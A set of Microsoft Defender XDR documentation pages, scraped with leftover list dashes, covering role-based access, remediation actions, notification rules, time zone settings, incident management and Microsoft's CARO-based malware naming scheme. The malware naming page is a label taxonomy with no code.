security M365d Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-permissions.md
- Title: Manage access to Microsoft Defender XDR data in the Microsoft Defender portal
-description: Learn how to manage permissions to data in Microsoft Defender XDR
-
- - NOCSH
------ m365-security-- tier1-- essentials-manage-
- - MOE150
- - MET150
Previously updated : 03/04/2024--
-# Manage access to Microsoft Defender XDR with Microsoft Entra global roles
-
-> [!NOTE]
-> Microsoft Defender XDR users can now take advantage of a centralized permissions management solution to control user access and permissions across different Microsoft security solutions. Learn more about the [Microsoft Defender XDR Unified role-based access control (RBAC)](manage-rbac.md).
-
-**Applies to:**
--- Microsoft Defender XDR--
-There are two ways to manage access to Microsoft Defender XDR:
--- **Global Microsoft Entra roles**-- **Custom role access**-
-Accounts assigned the following **Global Microsoft Entra roles** can access Microsoft Defender XDR functionality and data:
--- Global administrator-- Security administrator-- Security Operator-- Global Reader-- Security Reader-
-To review accounts with these roles, [view Permissions in the Microsoft Defender portal](https://security.microsoft.com/permissions).
-
-**Custom role** access is a capability in Microsoft Defender XDR that allows you to manage access to specific data, tasks, and capabilities in Microsoft Defender XDR. Custom roles offer more control than global Microsoft Entra roles, providing users only the access they need with the least-permissive roles necessary. Custom roles can be created in addition to global Microsoft Entra roles. [Learn more about custom roles](custom-roles.md).
-
-> [!NOTE]
-> This article applies only to managing global Microsoft Entra roles. For more information about using custom role-based access control, see [Custom roles for role-based access control](custom-roles.md)
-
-## Access to functionality
-
-Access to specific functionality is determined by your [Microsoft Entra role](/azure/active-directory/roles/permissions-reference). Contact a global administrator if you need access to specific functionality that requires you or your user group be assigned a new role.
-
-### Approve pending automated tasks
-
-[Automated investigation and remediation](m365d-autoir-actions.md) can take action on emails, forwarding rules, files, persistence mechanisms, and other artifacts found during investigations. To approve or reject pending actions that require explicit approval, you must have certain roles assigned in Microsoft 365. To learn more, see [Action center permissions](m365d-action-center.md#required-permissions-for-action-center-tasks).
-
-## Access to data
-
-Access to Microsoft Defender XDR data can be controlled using the scope assigned to user groups in Microsoft Defender for Endpoint role-based access control (RBAC). If your access hasn't been scoped to a specific set of devices in the Defender for Endpoint, you'll have full access to data in Microsoft Defender XDR. However, once your account is scoped, you'll only see data about the devices in your scope.
-
-For example, if you belong to only one user group with a Microsoft Defender for Endpoint role and that user group has been given access to sales devices only, you'll see only data about sales devices in Microsoft Defender XDR. [Learn more about RBAC settings in Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/rbac)
-
-### Microsoft Defender for Cloud Apps access controls
-
-During the preview, Microsoft Defender XDR doesn't enforce access controls based on Defender for Cloud Apps settings. Access to Microsoft Defender XDR data isn't affected by these settings.
-
-## Related articles
--- [Custom roles in role-based access control for Microsoft Defender XDR](custom-roles.md)-- [Microsoft Entra built-in roles](/azure/active-directory/roles/permissions-reference)-- [Microsoft Defender for Endpoint RBAC](/windows/security/threat-protection/microsoft-defender-atp/rbac)-- [Defender for Cloud Apps roles](/cloud-app-security/manage-admins)
security M365d Remediation Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-remediation-actions.md
- Title: Remediation actions in Microsoft Defender XDR
-description: Get an overview of remediation actions that follow automated investigations in Microsoft Defender XDR
-
- - NOCSH
----
- - m365-security
- - tier3
--- Previously updated : 02/17/2021--
-# Remediation actions in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-During and after an automated investigation in Microsoft Defender XDR, remediation actions are identified for malicious or suspicious items. Some kinds of remediation actions are taken on devices, also referred to as endpoints. Other remediation actions are taken on identities, accounts and email content. Automated investigations complete after remediation actions are taken, approved, or rejected.
-
-> [!IMPORTANT]
-> Whether remediation actions are taken automatically or only upon approval depends on certain settings, such as automation levels. To learn more, see the following articles:
->
-> - [Configure your automated investigation and response capabilities in Microsoft Defender XDR](m365d-configure-auto-investigation-response.md)
-> - [Configure action accounts in Microsoft Defender for Identity](/defender-for-identity/manage-action-accounts)
-> - [How threats are remediated on devices](../defender-endpoint/automated-investigations.md)
-> - [Threats and remediation actions on email & collaboration content](../office-365-security/air-remediation-actions.md#threats-and-remediation-actions)
-
-The following table summarizes remediation actions that are currently supported in Microsoft Defender XDR.
-
-|Device (endpoint) remediation actions |Email remediation actions |Users (accounts) |
-|:|:|-|
-|- Collect investigation package <br/>- Isolate device (this action can be undone)<br/>- Offboard machine <br/>- Release code execution <br/>- Release from quarantine <br/>- Request sample <br/>- Restrict code execution (this action can be undone) <br/>- Run antivirus scan <br/>- Stop and quarantine <br/>- Contain devices from the network |- Block URL (time-of-click)<br/>- Soft delete email messages or clusters<br/>- Quarantine email<br/>- Quarantine an email attachment<br/>- Turn off external mail forwarding |- Disable user<br />- Reset user password<br />- Confirm user as compromised |
-
-Remediation actions, whether pending approval or already complete, can be viewed in the [Action center](m365d-action-center.md).
-
-## Remediation actions that follow automated investigations
-
-When an automated investigation completes, a verdict is reached for every piece of evidence involved. Depending on the verdict, remediation actions are identified. In some cases, remediation actions are taken automatically; in other cases, remediation actions await approval. It all depends on how [automated investigation and response is configured](m365d-configure-auto-investigation-response.md).
-
-The following table lists possible verdicts and outcomes:
-
-| Verdict | Affected entities | Outcomes|
-||||
-| Malicious | Devices (endpoints) | Remediation actions are taken automatically (assuming your organization's [device groups](m365d-configure-auto-investigation-response.md#review-or-change-the-automation-level-for-device-groups) are set to **Full - remediate threats automatically**)|
-| Compromised | Users | Remediation actions are taken automatically |
-| Malicious | Email content (URLs or attachments) | Recommended remediation actions are pending approval|
-| Suspicious | Devices or email content | Recommended remediation actions are pending approval|
-| No threats found | Devices or email content | No remediation actions are needed|
-
-## Remediation actions that are taken manually
-
-In addition to remediation actions that follow automated investigations, your security operations team can take certain remediation actions manually. These include the following:
--- Manual device action, such as device isolation or file quarantine-- Manual email action, such as soft-deleting email messages-- Manual user action, such as disable user or reset user password-- [Advanced hunting](../defender-endpoint/advanced-hunting-overview.md) action on devices, users, or email-- [Explorer](../office-365-security/threat-explorer-real-time-detections-about.md) action on email content, such as moving email to junk, soft-deleting email, or hard-deleting email-- Manual [live response](/windows/security/threat-protection/microsoft-defender-atp/live-response) action, such as deleting a file, stopping a process, and removing a scheduled task-- Live response action with [Microsoft Defender for Endpoint APIs](../defender-endpoint/management-apis.md#microsoft-defender-for-endpoint-apis), such as isolating a device, running an antivirus scan, and getting information about a file-
-## Next steps
--- [Visit the Action center](m365d-action-center.md)-- [View and manage remediation actions](m365d-autoir-actions.md)-- [Address false positives or false negatives](m365d-autoir-report-false-positives-negatives.md)-- [Contain devices from the network](../defender-endpoint\respond-machine-alerts.md#contain-devices-from-the-network)
security M365d Response Actions Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-response-actions-notifications.md
- Title: Get email notifications for response actions in Microsoft Defender XDR
-description: Set up email notifications to get notified of manual and automated response actions in Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - tier1
-
- - MOE150
- - MET150
Previously updated : 03/28/2024--
-# Get email notifications for response actions in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR--
-You can set up Microsoft Defender XDR to notify you through email about manual or automated response actions.
-
-[Manual response actions](respond-first-incident-remediate.md#manual-remediation) are actions that security teams can use to stop threats or aid in investigation of attacks. These actions vary depending on the Defender workload enabled in your environment.
-
-[Automated response actions](respond-first-incident-remediate.md#automatic-remediation), on the other hand, are capabilities in Microsoft 35 Defender that scale investigation and resolution to threats automatically. Automated remediation capabilities consist of [automatic attack disruption](automatic-attack-disruption.md) and [automated investigation and response](m365d-autoir.md).
-
-> [!NOTE]
-> You need the **Manage security settings** permission to configure email notification settings. If you've chosen to use basic permissions management, users with Security Administrator or Global Administrator roles can configure email notifications. Likewise, if your organization is using [role-based access control (RBAC)](manage-rbac.md), you can only create, edit, delete, and receive notifications based on device groups that you are allowed to manage.
-
-## Create a rule for email notifications
-
-> [!NOTE]
-> The response action email notification currently does not support custom detections containing response actions.
-
-To create a rule for email notifications, perform the following steps:
-
-1. In the navigation pane of Microsoft Defender XDR, select **Settings > Microsoft Defender XDR**. Under **General**, select **Email notifications**. Go to the **Actions** tab.
-2. Select **Add notification rule**. Add a rule name and description under Basics. Both Name and Description fields accept letters, numbers, and spaces only.
-3. Proceed to the next section by selecting Next located at the bottom of the pane.
-4. You can choose what type of action, what status, and where the action will be sourced from in the **Notification settings** section.
-5. Under **Action source**, select if you want to be notified for manual or automated response actions. You can select both options.
-6. Select the specific response actions in the checklist that appears under **Action**. You can choose multiple actions available in the checklist. Note that response actions will vary depending on the Defender workload enabled in your environment. All actions selected appears in the Action field upon completion.
-7. You can choose to be notified based on the device groups where the response actions are applied in the **Device groups scope**. To be notified of response actions taken in all current and future device groups, selecting **All device** groups. To be notified of response actions taken in devices that belong to your selected device group, choose **Selected device groups**.
-8. Select if you want to be notified if an action is completed or failed in the **Action status** field. You can select all options available.
-9. At the bottom of the pane, you can proceed to the next section by selecting **Next**. Alternately, you can go back to the Basics section by selecting Back.
-10. In the **Recipients** section, you can add one or more email addresses that will receive notifications. Separate multiple addresses by adding a comma at the end of each address. Select **Add** to add the recipients. You can see the recipients at the bottom of the pane after successfully adding addresses.
-11. Test the notification by selecting **Send test email**. Select Next located on the bottom of the pane to proceed to the review section.
-12. Check the rule's details in the **Review rule** section. You can edit the details by selecting **Edit** under each section's details.
-13. Select **Submit** at the bottom of the pane to finish the rule creation. Recipients will start receiving notifications through email based on the settings. The new rule appears in the Notifications rule list under the Actions tab.
-14. To edit or delete a notification rule, select the rule from the list. Select **Edit** to change the rule's details. Select **Delete** to remove the rule.
-
-Once you get the notification, you can go directly to the action and review or remediate the action.
-
-## Next steps
--- [Get email notifications on incidents](m365d-notifications-incidents.md)-- [Get email notifications about new reports in Threat analytics](m365d-threat-analytics-notifications.md)-
-## See also
--- [Configure automatic attack disruption capabilities](configure-attack-disruption.md)-- [Configure automated investigation and response](m365d-configure-auto-investigation-response.md)-
security M365d Threat Analytics Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-threat-analytics-notifications.md
- Title: Get email notifications for Threat analytics updates in Microsoft Defender XDR-
-description: Set up email notifications to get notified of new Threat analytics reports in Microsoft Defender XDR.
--- NOCSH------ m365-security -- m365initiative-m365-defender -- tier1-- Previously updated : 03/28/2024--
-# Get email notifications for Threat analytics updates in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-You can set up email notifications that will send you updates on [threat analytics](threat-analytics.md) reports.
-
-## Set up email notifications for report updates
-
-To set up email notifications for threat analytics reports, perform the following steps:
-
-1. Select **Settings** in the Microsoft Defender XDR sidebar. Select **Microsoft Defender XDR** from the list of settings.
-
-![Screenshot with "Settings" and "Microsoft Defender XDR" both highlighted in red](../../media/threat-analytics/ta_create_notification_0.png)
-
-2. Choose **Email notifications** > **Threat analytics**, and select the button, **+ Create a notification rule**. A flyout will appear.
-
-![Screenshot with "+ Create a notification rule" highlighted in red](../../media/threat-analytics/ta_create_notification_1.png)
-
-3. Follow the steps listed in the flyout. First, give your new rule a name. The description field is optional, but a name is required. You can toggle the rule on or off using the checkbox under the description field.
-
-> [!NOTE]
-> The name and description fields for a new notification rule only accept English letters and numbers. They don't accept spaces, dashes, underscores, or any other punctuation.
-
-![Screenshot of the naming screen, with all fields filled out and the "Turn rule on" checkbox checked](../../media/threat-analytics/ta_create_notification_2.png)
-
-4. Choose which kind of reports you want to be notified about. You can choose between being updated about all newly published or updated reports, or only those reports which have a certain tag or type.
-
-![Screenshot of the notification screen, with Ransomware tags selected and a drop down menu for types open](../../media/threat-analytics/ta_create_notification_3.png)
-
-5. Add at least one recipient to receive the notification emails. You can also use this screen to check how the notifications will be received, by sending a test email.
-
-![Screenshot of the recipients screen. There are 3 recipients listed, and a test email has been sent, as indicated by a green checkmark](../../media/threat-analytics/ta_create_notification_4.png)
-
-6. Review your new rule. If there is anything you would like to change, select the **Edit** button at the end of each subsection. Once your review is complete, select the **Create rule** button.
-
-![Screenshot of the review screen. An edit button is highlighted in red](../../media/threat-analytics/ta_create_notification_5.png)
-
-7. Congratulations! Your new rule has been successfully created. Select the **Done** button to complete the process and close the flyout.
-
-![Screenshot of the rule created screen. A successfully created rule will display green checkmarks along the sidebar, and a big green check in the main area of the screen](../../media/threat-analytics/ta_create_notification_6.png)
-
-8. Your new rule will now appear in the list of Threat analytics email notifications.
-
-![Screenshot of the list of email notification rules within the Settings screen](../../media/threat-analytics/ta_create_notification_7.png)
-
-## Next steps
--- [Get email notifications on incidents](m365d-notifications-incidents.md)-- [Get email notifications on response actions](m365d-response-actions-notifications.md)-
security M365d Time Zone https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-time-zone.md
- Title: Set the time zone for Microsoft Defender XDR features
-description: Learn how to choose the time zone for date and time information associated with incidents, automated investigation and remediation, and advanced hunting
-
- - NOCSH
------ m365-security-- tier3-
- - MOE150
- - MET150
Previously updated : 03/28/2024--
-# Set the time zone for Microsoft Defender XDR
---
-**Applies to:**
-- Microsoft Defender XDR---
-Microsoft Defender XDR can display date and time information using either your local time zone or UTC. The selected time zone will apply to all date and time information shown in the following features in the Microsoft Defender portal:
-- Incidents-- Automated investigation and remediation, including the action center-- Advanced hunting results-- Identity timeline-
-To set the time zone for these features, go to **Settings** > **Security center** > **Time zone**
-
-> [!NOTE]
-> The custom time range filter in advanced hunting remains in UTC regardless of the time zone setting.
security Malware Naming https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/malware-naming.md
- Title: How Microsoft names malware-
-description: Understand the malware naming convention used by Microsoft Defender Antivirus and other Microsoft antimalware.
------- m365-security-- tier2-- must-keep- Previously updated : 08/18/2023--
-# Malware names
-
-We name the malware and unwanted software that we detect according to the Computer Antivirus Research Organization (CARO) malware naming scheme. The scheme uses the following format:
-
-![How Microsoft determines names malware](../../media/security-intelligence-images/naming-malware.png)
-
-When our analysts research a particular threat, they determine what each of the components name is.
-
-## Type
-
-Describes what the malware does on your computer. Worms, viruses, trojans, backdoors, and ransomware are some of the most common types of malware.
-```
-* Adware
-* Backdoor
-* Behavior
-* BrowserModifier
-* Constructor
-* DDoS
-* Exploit
-* HackTool
-* Joke
-* Misleading
-* MonitoringTool
-* Program
-* Personal Web Server (PWS)
-* Ransom
-* RemoteAccess
-* Rogue
-* SettingsModifier
-* SoftwareBundler
-* Spammer
-* Spoofer
-* Spyware
-* Tool
-* Trojan
-* TrojanClicker
-* TrojanDownloader
-* TrojanNotifier
-* TrojanProxy
-* TrojanSpy
-* VirTool
-* Virus
-* Worm
-```
-## Platforms
-
-Platforms guide the malware to its compatible operating system (such as Windows, macOS, and Android). The platform's guidance is also used for programming languages and file formats.
-
-### Operating systems
-```
-* AndroidOS: Android operating system
-* DOS: MS-DOS platform
-* EPOC: Psion devices
-* FreeBSD: FreeBSD platform
-* iOS: iPhone operating system
-* Linux: Linux platform
-* macOS: MAC 9.x platform or earlier
-* macOS_X: macOS X or later
-* OS2: OS2 platform
-* Palm: Palm operating system
-* Solaris: System V-based Unix platforms
-* SunOS: Unix platforms 4.1.3 or lower
-* SymbOS: Symbian operating system
-* Unix: general Unix platforms
-* Win16: Win16 (3.1) platform
-* Win2K: Windows 2000 platform
-* Win32: Windows 32-bit platform
-* Win64: Windows 64-bit platform
-* Win95: Windows 95, 98 and ME platforms
-* Win98: Windows 98 platform only
-* WinCE: Windows CE platform
-* WinNT: WinNT
-```
-
-### Scripting languages
-```
-* ABAP: Advanced Business Application Programming scripts
-* ALisp: ALisp scripts
-* AmiPro: AmiPro script
-* ANSI: American National Standards Institute scripts
-* AppleScript: compiled Apple scripts
-* ASP: Active Server Pages scripts
-* AutoIt: AutoIT scripts
-* BAS: Basic scripts
-* BAT: Basic scripts
-* CorelScript: Corelscript scripts
-* HTA: HTML Application scripts
-* HTML: HTML Application scripts
-* INF: Install scripts
-* IRC: mIRC/pIRC scripts
-* Java: Java binaries (classes)
-* JS: JavaScript scripts
-* LOGO: LOGO scripts
-* MPB: MapBasic scripts
-* MSH: Monad shell scripts
-* MSIL: .NET intermediate language scripts
-* Perl: Perl scripts
-* PHP: Hypertext Preprocessor scripts
-* Python: Python scripts
-* SAP: SAP platform scripts
-* SH: Shell scripts
-* VBA: Visual Basic for Applications scripts
-* VBS: Visual Basic scripts
-* WinBAT: Winbatch scripts
-* WinHlp: Windows Help scripts
-* WinREG: Windows registry scripts
-```
-
-### Macros
-```
-* A97M: Access 97, 2000, XP, 2003, 2007, and 2010 macros
-* HE: macro scripting
-* O97M: Office 97, 2000, XP, 2003, 2007, and 2010 macros - those that affect Word, Excel, and PowerPoint
-* PP97M: PowerPoint 97, 2000, XP, 2003, 2007, and 2010 macros
-* V5M: Visio5 macros
-* W1M: Word1Macro
-* W2M: Word2Macro
-* W97M: Word 97, 2000, XP, 2003, 2007, and 2010 macros
-* WM: Word 95 macros
-* X97M: Excel 97, 2000, XP, 2003, 2007, and 2010 macros
-* XF: Excel formulas
-* XM: Excel 95 macros
-```
-
-### Other file types
-```
-* ASX: XML metafile of Windows Media .asf files
-* HC: HyperCard Apple scripts
-* MIME: MIME packets
-* Netware: Novell Netware files
-* QT: Quicktime files
-* SB: StarBasic (StarOffice XML) files
-* SWF: Shockwave Flash files
-* TSQL: MS SQL server files
-* XML: XML files
-```
-## Family
-
-Grouping of malware based on common characteristics, including attribution to the same authors. Security software providers sometimes use different names for the same malware family.
-
-## Variant letter
-
-Used sequentially for every distinct version of a malware family. For example, the detection for the variant **".AF"** would have been created after the detection for the variant **".AE"**.
-
-## Suffixes
-
-Provides extra detail about the malware, including how it's used as part of a multicomponent threat. In the preceding example, **"!lnk"** indicates that the threat component is a shortcut file used by Trojan: **Win32/Reveton.T**.
-```
-* .dam: damaged malware
-* .dll: Dynamic Link Library component of a malware
-* .dr: dropper component of a malware
-* .gen: malware that is detected using a generic signature
-* .kit: virus constructor
-* .ldr: loader component of a malware
-* .pak: compressed malware
-* .plugin: plug-in component
-* .remnants: remnants of a virus
-* .worm: worm component of that malware
-* !bit: an internal category used to refer to some threats
-* !cl: an internal category used to refer to some threats
-* !dha: an internal category used to refer to some threats
-* !pfn: an internal category used to refer to some threats
-* !plock: an internal category used to refer to some threats
-* !rfn: an internal category used to refer to some threats
-* !rootkit: rootkit component of that malware
-* @m: worm mailers
-* @mm: mass mailer worm
-```
security Manage Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/manage-incidents.md
- Title: Manage incidents in Microsoft Defender
-description: Learn how to assign, update the status,
-
- - NOCSH
----
- - m365-security
- - tier1
--
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Manage incidents in Microsoft Defender
---
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-Incident management is critical to ensuring that incidents are named, assigned, and tagged to optimize time in your incident workflow and more quickly contain and address threats.
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
-
-You can manage incidents from **Incidents & alerts > Incidents** on the quick launch of the Microsoft Defender portal ([security.microsoft.com](https://security.microsoft.com)). Here's an example.
--
-Here are the ways you can manage your incidents:
--- [Edit the incident name](#edit-the-incident-name)-- [Assign or change severity](#assign-or-change-incident-severity)-- [Add incident tags](#add-incident-tags)-- [Assign the incident to a user account](#assign-an-incident)-- [Resolve them](#resolve-an-incident)-- [Specify its classification](#specify-the-classification)-- [Add comments](#add-comments)-- Assess the activity audit and add comments in the [Activity log](#activity-log)-- [Export incident data to PDF](#export-incident-data-to-pdf)-
-You can manage incidents from the **Manage incident** pane for an incident. Here's an example.
--
-You can display this pane from the **Manage incident** link on the:
--- **Alert story** page.-- Properties pane of an incident in the incident queue.-- **Summary** page of an incident.-- Manage incident option located on the upper right side of the Incident page.-
-In cases where you want to move alerts from one incident to another, you can also do so from the **Alerts** tab, thus creating a larger or smaller incident that includes all relevant alerts.
-
-## Edit the incident name
-
-Microsoft Defender automatically assigns a name based on alert attributes such as the number of endpoints affected, users affected, detection sources or categories. The incident name allows you to quickly understand the scope of the incident. For example: *Multi-stage incident on multiple endpoints reported by multiple sources.*
-
-You can edit the incident name from the **Incident name** field on the **Manage incident** pane.
-
-> [!NOTE]
-> Incidents that existed before the rollout of the automatic incident naming feature will retain their name.
-
-## Assign or change incident severity
-
-You can assign or change the severity of an incident from the **Severity** field on the **Manage incident** pane. The severity of an incident is determined by the highest severity of the alerts associated with it. The severity of an incident can be set to high, medium, low, or informational.
-
-## Add incident tags
-
-You can add custom tags to an incident, for example to flag a group of incidents with a common characteristic. You can later filter the incident queue for all incidents that contain a specific tag.
-
-The option to select from a list of previously-used and selected tags appear after you start typing.
-
-## Assign an incident
-
-You can select the **Assign to** box and specify the user account to assign an incident. To reassign an incident, remove the current assignment account by selecting the "x" next to the account name and then select the **Assign to** box. Assigning ownership of an incident assigns the same ownership to all the alerts associated with it.
-
-You can get a list of incidents assigned to you by filtering the incident queue.
-
-1. From the incident queue, select **Filters**.
-2. In the **Incident assignment** section, clear **Select all**. Select **Assigned to me**, **Assigned to another user**, or **Assigned to a user group**.
-3. Select **Apply**, and then close the **Filters** pane.
-
-You can then save the resulting URL in your browser as a bookmark to quickly see the list of incidents assigned to you.
-
-## Resolve an incident
-
-Select **Resolve incident** to move the toggle to the right when an incident is remediated. Resolving an incident also resolves all the linked and active alerts related to the incident.
-
-An incident that isn't resolved displays as **Active**.
-
-## Specify the classification
-
-From the **Classification** field, you specify whether the incident is:
--- **Not set** (the default).-- **True positive** with a type of threat. Use this classification for incidents that accurately indicate a real threat. Specifying the threat type helps your security team see threat patterns and act to defend your organization from them.-- **Informational, expected activity** with a type of activity. Use the options in this category to classify incidents for security tests, red team activity, and expected unusual behavior from trusted apps and users.-- **False positive** for types of incidents that you determine can be ignored because they're technically inaccurate or misleading.-
-Classifying incidents and specifying their status and type helps tune Microsoft Defender XDR to provide better detection determination over time.
-
-## Add comments
-
-You can add multiple comments to an incident with the **Comment** field. The comment field supports text and formatting, links, and images. Each comment is limited to 30,000 characters.
-
-All comments are added to the historical events of the incident. You can see the comments and history of an incident from the **Comments and history** link on the **Summary** page.
-
-## Activity log
-
-The **Activity log** displays a list of all the comments and actions performed on the incident, known as *Audits and comments*. All changes made to the incident, whether by a user or by the system, are recorded in the activity log. The activity log is available from the **Activity log** option on the incident page or on the incident side pane.
--
-You can filter the activities within the log by comments and actions. Click the **Content: Audits, Comments** then select the content type to filter activities. Here's an example.
--
-You can also add your own comments using the comment box available within the activity log. The comment box accepts text and formatting, links, and images.
--
-## Export incident data to PDF
-
-> [!IMPORTANT]
-> Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
->
-> The export incident data feature is currently available to Microsoft Defender XDR and Microsoft Defender unified security operations center (SOC) platform customers with the Microsoft Copilot for security license.
-
-You can export an incidentΓÇÖs data to PDF through the **Export incident as PDF** function and save it into PDF format. This function allows security teams to review an incidentΓÇÖs details offline at any given time.
-
-The incident data exported includes the following information:
--- An overview containing the incident details-- The [attack story](investigate-incidents.md#attack-story) graph and threat categories-- The impacted [assets](investigate-incidents.md#assets), covering up to 10 assets for each asset type-- The [evidence list](investigate-incidents.md#evidence-and-response) covering up to 100 items-- Supporting data, including all [related alerts](investigate-incidents.md#alerts) and activities recorded in the [activity log](#activity-log)-
-Here's an example of the exported PDF:
--
-If you have the [Copilot for Security](/security-copilot/microsoft-security-copilot) license, the exported PDF contains the following additional incident data:
--- [Incident summary](security-copilot-m365d-incident-summary.md)-- [Incident report](security-copilot-m365d-create-incident-report.md)-
-The export to PDF function is also available in the Copilot side panel of a generated incident report.
-
-![Screenshot of additional actions in the incident report results card.](../../media/incidents-queue/export-incident-more-actions1.png)
-
-To generate the PDF, perform the following steps:
-
-1. Open an incident page. Select the **More actions** ellipsis (...) on the upper right corner and choose **Export incident as PDF**. The function becomes grayed out while the PDF is being generated.
-
- :::image type="content" source="../../media/incidents-queue/export-incident-main-small.png" alt-text="Screenshot highlighting the export incident to PDF option." lightbox="../../media/incidents-queue/export-incident-main.png":::
-
-1. A dialog box appears, indicating that the PDF is being generated. Select **Got it** to close the dialog box. Additionally, a status message indicating the current state of the download appears below the incident title. The export process may take a few minutes depending on the incident's complexity and the amount of data to be exported.
-
- :::image type="content" source="../../media/incidents-queue/export-incident-predownload-small.png" alt-text="Screenshot highlighting export message and status before download." lightbox="../../media/incidents-queue/export-incident-predownload.png":::
-
-1. Once the PDF is ready, the status message indicates that the PDF is ready and another dialog box appears. Select **Download** from the dialog box to save the PDF to your device.
-
- :::image type="content" source="../../media/incidents-queue/export-incident-download-small.png" alt-text="Screenshot highlighting export message and status when download is available." lightbox="../../media/incidents-queue/export-incident-download.png":::
-
-The report is cached for a couple of minutes. The system provides the previously generated PDF if you try to export the same incident again within a short time frame. To generate a newer version of the PDF, wait for a few minutes for the cache to expire.
-
-## Next steps
-
-For new incidents, begin your [investigation](investigate-incidents.md).
-
-For in-process incidents, continue your [investigation](investigate-incidents.md).
-
-For resolved incidents, perform a [post-incident review](first-incident-post.md).
-
-## See also
--- [Incidents overview](incidents-overview.md)-- [Prioritize incidents](incident-queue.md)-- [Investigate incidents](investigate-incidents.md)-
security Manage Rbac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/manage-rbac.md
- Title: Microsoft Defender XDR Unified role-based access control (RBAC)
-description: Manage permissions and access to Microsoft Defender XDR Security portal experiences using unified role-based access control (RBAC).
------- m365-security-- tier3-- Previously updated : 03/28/2024---
-# Microsoft Defender XDR Unified role-based access control (RBAC)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/?LinkID=2198108)-- [Microsoft Defender for Office 365 P2](https://go.microsoft.com/fwlink/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-Microsoft Defender XDR provides integrated threat protection, detection, and response across endpoints, email, identities, applications, and data within a single portal. Controlling a user's permissions around their access to view data or complete tasks is essential for organizations to minimize the risks associated with unauthorized access.
-
-The Microsoft Defender XDR Unified role-based access control (RBAC) model provides a single permissions management experience that provides one central location for administrators to control user permissions across different security solutions.
-
-<a name='whats-supported-by-the-microsoft-365-defender-unified-rbac-model'></a>
-
-## What's supported by the Microsoft Defender XDR Unified RBAC model
-
-Centralized permissions management is supported for the following solutions:
-
-|Solution|Description|
-|||
-|Microsoft Defender XDR|Centralized permissions management for Microsoft Defender XDR experiences.|
-|Microsoft Defender for Endpoint|Full support for all endpoint data and actions. All roles are compatible with the device group's scope as defined on the device groups page.|
-|Microsoft Defender Vulnerability Management|Centralized permissions management for all Defender Vulnerability Management capabilities.|
-|Microsoft Defender for Office 365|Full support for all data and actions scenarios that are controlled by [Email & Collaboration roles](../office-365-security/mdo-portal-permissions.md) and scenarios controlled by [Exchange Online permissions](/exchange/permissions-exo/permissions-exo). </br></br> **Note:** <ul><li>The Microsoft Defender XDR RBAC model is initially available for organizations with Microsoft Defender for Office 365 Plan 2 licenses only. This capability isn't available to users on trial licenses.</li><li>Granular delegated admin privileges (GDAP) aren't supported.</li><li>Cmdlets in Exchange Online PowerShell and Security & Compliance PowerShell continue to use the old RBAC models and aren't affected by Microsoft Defender XDR Unified RBAC.</li><li>Azure B2B invited guests aren't supported by experiences that were previously under Exchange Online RBAC.</li></ul>|
-|Microsoft Defender for Identity|Full support for all identity data and actions. </br></br> **Note:** Defender for Identity experiences also adhere to permissions granted from [Microsoft Defender for Cloud Apps](https://security.microsoft.com/cloudapps/permissions/roles). For more information, see [Microsoft Defender for Identity role groups](https://go.microsoft.com/fwlink/?linkid=2202729).|
-|Microsoft Defender for Cloud|Support access management for all Defender for Cloud data that is available in Microsoft Defender portal.|
-|Microsoft Secure Score|Full support for all Secure Score data from the [Products included in Secure Score](../defender/microsoft-secure-score.md#products-included-in-secure-score).|
-
-> [!NOTE]
-> Scenarios and experiences controlled by Compliance permissions are still managed in the Microsoft Purview compliance portal.
->
-> This offering isn't currently available for Microsoft Defender for CloudApps.
-
-## Before you start
-
-This section provides useful information on what you need to know before you start using Microsoft Defender XDR Unified RBAC.
-
-### Permissions pre-requisites
--- You must be a Global Administrator or Security Administrator in Microsoft Entra ID to:
- - Gain initial access to [Permissions and roles](https://security.microsoft.com/mtp_roles) in the Microsoft Defender portal.
-
- - Manage roles and permissions in Microsoft Defender XDR Unified RBAC.
-
- - Create a custom role that can grant access to security groups or individual users to manage roles and permissions in Microsoft Defender XDR unified RBAC. This removes the need for Microsoft Entra global roles to manage permissions. To do this, you need to assign the **Authorization** permission in Microsoft Defender XDR Unified RBAC. For details on how to assign the Authorization permission, see [Create a role to access and manage roles and permissions](../defender/create-custom-rbac-roles.md#create-a-role-to-access-and-manage-roles-and-permissions).
--- The Microsoft Defender XDR security solution continues to respect existing Microsoft Entra global roles when you activate the Microsoft Defender XDR Unified RBAC model for some or all of your workloads, that is, Global Admins retain assigned admin privileges.-
-### Migration of existing roles and permissions
-
-The new Microsoft Defender XDR Unified RBAC model provides easy migration of the existing permissions in the individual supported unified RBAC models to the new RBAC model.
-
